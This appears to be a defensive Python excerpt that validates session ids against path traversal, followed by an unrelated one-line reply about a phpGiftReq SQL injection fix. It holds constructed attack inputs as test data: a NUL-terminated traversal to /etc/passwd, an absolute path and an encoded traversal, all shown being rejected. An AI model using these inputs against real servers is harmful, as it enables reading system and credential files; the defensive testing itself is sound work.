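SESSION_ID_RE = re.compile(r"\A[A-Za-z0-9_-]{8,64}\Z")


class BadSessionId(ValueError):
    """Raised for any session id that must not reach include()/unlink()."""


def validate_session_id(session_id: str) -> str:
    # Checked separately so the reason names the NUL-byte trick from the advisory.
    if "\x00" in session_id:
        raise BadSessionId("NUL byte in session id")
    if not SESSION_ID_RE.match(session_id):
        raise BadSessionId("session id contains characters outside the allow-list")
    return session_id


def session_file_path(session_id: str, base_dir: str = SESSION_DIR) -> str:
    """Map a validated session id to a file inside base_dir.  The realpath /
    commonpath check is defence in depth: even if the allow-list were loosened
    later, the resolved path can never leave base_dir."""
    sid = validate_session_id(session_id)
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, sid + ".xml"))
    if os.path.commonpath([base, target]) != base:
        raise BadSessionId("resolved path escapes the session directory")
    return target


SESSION_TAG_RE = re.compile(rb"<sessionId>(.*?)</sessionId>", re.DOTALL)


def session_id_from_body(body: bytes) -> str:
    """Pull the sessionId element out of a POST body shaped like the advisory's
    proof of concept.  latin-1 keeps every byte (NUL included) so the validator
    sees exactly what the client sent."""
    m = SESSION_TAG_RE.search(body)
    if not m:
        raise BadSessionId("no sessionId element in request body")
    return m.group(1).decode("latin-1")


def handle_request(body: bytes) -> dict:
    """Decision record: the path that would be used, or why the request was
    refused.  Nothing is opened, included or deleted here."""
    try:
        sid = session_id_from_body(body)
        return {"accepted": True, "path": session_file_path(sid)}
    except BadSessionId as exc:
        return {"accepted": False, "reason": str(exc)}


# Constructed request bodies (not captured traffic).
BENIGN_BODY = b"<sessionId>a1b2c3d4e5f6</sessionId>"
TRAVERSAL_BODY = b"<sessionId>../../../../../etc/passwd\x00</sessionId>"
ABSOLUTE_BODY = b"<sessionId>/etc/passwd</sessionId>"
ENCODED_BODY = b"<sessionId>..%2F..%2Fetc%2Fpasswd</sessionId>"

if __name__ == "__main__":
    for body in (BENIGN_BODY, TRAVERSAL_BODY, ABSOLUTE_BODY, ENCODED_BODY):
        print(body, "->", handle_request(body))
```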
Re: phpGiftReq SQL Injection
All SQL queries have been replaced with parameterized statements in version 2.0.0.